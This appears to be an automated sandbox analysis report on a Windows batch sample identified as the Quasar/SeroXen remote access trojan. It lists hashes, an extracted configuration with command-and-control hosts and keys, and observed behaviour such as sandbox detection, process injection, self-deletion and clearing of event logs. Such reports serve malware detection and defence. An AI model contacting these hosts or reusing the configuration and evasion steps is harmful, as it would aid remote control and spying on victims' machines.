quasar | f9265a0554ffd7971bacbd4335ab32109aa2f8ba7f70dba315f4e1f48674b990

Analysis

max time kernel
900s
max time network
887s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
05/02/2025, 00:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

7.7MB
MD5

22070488e8b05fa3d1555e35cb02e2c4
SHA1

17affd9bceb5b254a65f2b918008118b3e771f5d
SHA256

f9265a0554ffd7971bacbd4335ab32109aa2f8ba7f70dba315f4e1f48674b990
SHA512

2db6d0ea121b100e0a2d69d93062f794ef52332139f67355a808cdf4310265575b17e62e3a6b2fe306a4ed8879a781bd203fc18cda7c074e0ded57c79528f0e6
SSDEEP

49152:E1Knuw9suLZqlYvKn2jUftGqD68t0vgVuX3e/YI7G6YLgkHB6yNKvNBynnHeZhCN:P

Score

10^/10

quasar seroxen v15.0 | fifa23 defense_evasion discovery spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.0 | Fifa23

private123.duckdns.org:8808

dofucks.com:8808

Mutex

c398e98c-136e-4007-ab40-e179829f338c

Attributes

encryption_key
C84CB6134701741C5122A14FACDB67C8CFA9C0AB
install_name
.exe
log_directory
Logs
reconnect_delay
3000
startup_key
$sxr-seroxen

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/336-19-0x000001EED4310000-0x000001EED4CD8000-memory.dmp	family_quasar

Seroxen family
seroxen
Seroxen, Ser0xen
Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.
trojan seroxen

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 336 created 640	336	test.bat.exe	5
PID 3140 created 640	3140	$sxr-seroxen.bat.exe	5
PID 3140 created 640	3140	$sxr-seroxen.bat.exe	5
PID 3200 created 2720	3200	svchost.exe	121

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Deletes itself 1 IoCs

pid	Process
336	test.bat.exe

Executes dropped EXE 2 IoCs

pid	Process
336	test.bat.exe
3140	$sxr-seroxen.bat.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe

Drops file in System32 directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File created	C:\Windows\System32\ucrtbased.dll	$sxr-seroxen.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\83209221-7a9c-453f-b1aa-0c96c7102882	lsass.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\Diagnostic.log	lsass.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\Preferred	lsass.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 336 set thread context of 3596	336	test.bat.exe	80
PID 3140 set thread context of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 set thread context of 1720	3140	$sxr-seroxen.bat.exe	85

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen\$sxr-nircmd.exe	$sxr-seroxen.bat.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\$sxr-seroxen.bat	test.bat.exe
File opened for modification	C:\Windows\$sxr-seroxen.bat	test.bat.exe
File created	C:\Windows\$sxr-seroxen.bat.exe	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen.bat.exe	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen.bat.exe	$sxr-seroxen.bat.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	svchost.exe

Checks processor information in registry 2 TTPs 26 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02osziddmcukogyz"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\""	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02rsyunriivtushc\Request Wednesday, February 05, 2025 00:24:35 = "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"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\02rsyunriivtushc\AppIdList	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1537126222-899333903-2037027349-1000\02plduylgqipnkri	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default	svchost.exe
